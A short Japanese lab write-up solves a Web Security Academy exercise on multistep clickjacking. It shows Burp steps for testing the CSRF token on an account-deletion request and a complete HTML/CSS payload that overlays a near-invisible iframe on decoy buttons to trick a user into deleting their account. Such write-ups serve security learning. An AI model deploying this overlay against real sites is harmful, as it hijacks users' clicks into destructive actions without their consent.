Hello there, ('ω')ノ
マルチステップクリックジャッキングを。
このラボには、 CSRFトークンで保護されているアカウント機能があって。
さらには、確認のダイアログもあり クリックジャッキング ます。
このラボを解決するには、アカウントの削除ボタンをクリックさせて。
次に確認ボタンをクリックする攻撃を作成して。
まずは、ログインして。
Deleteをクリックして。
最後にYesをクリックするようで。
ここでクリックすると削除されるので。
一旦、Dropして。
リクエストをリピータへ。
CSRFを削除してSendすると、正常なレスポンスが返って。
csrf=jzGxI8S4itomg9Y2aNyXysHaMBObfjhT
ちなみにメソッドをGETに変更して。
CSRFを削除してSendすると、Not Foundだとか。
下記のコードを挿入して。
<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.0001;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top: 500px;
left: 20px;
z-index: 1;
}
.secondClick {
top: 300px;
left: 220px;
left:$side_value2;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac801fdf1f33d06c8047022200b00016.web-security-academy.net/my-account"></iframe>
はじめのボタンの位置を調整して。
ふたつめのボタンの位置を調整して。
Storeして、Deliverするとクリアできた。
実際にView exploitで一連のボタンをクリックしてみて。
ログインしようとすると削除されていて。
Best regards, (^^ゞ
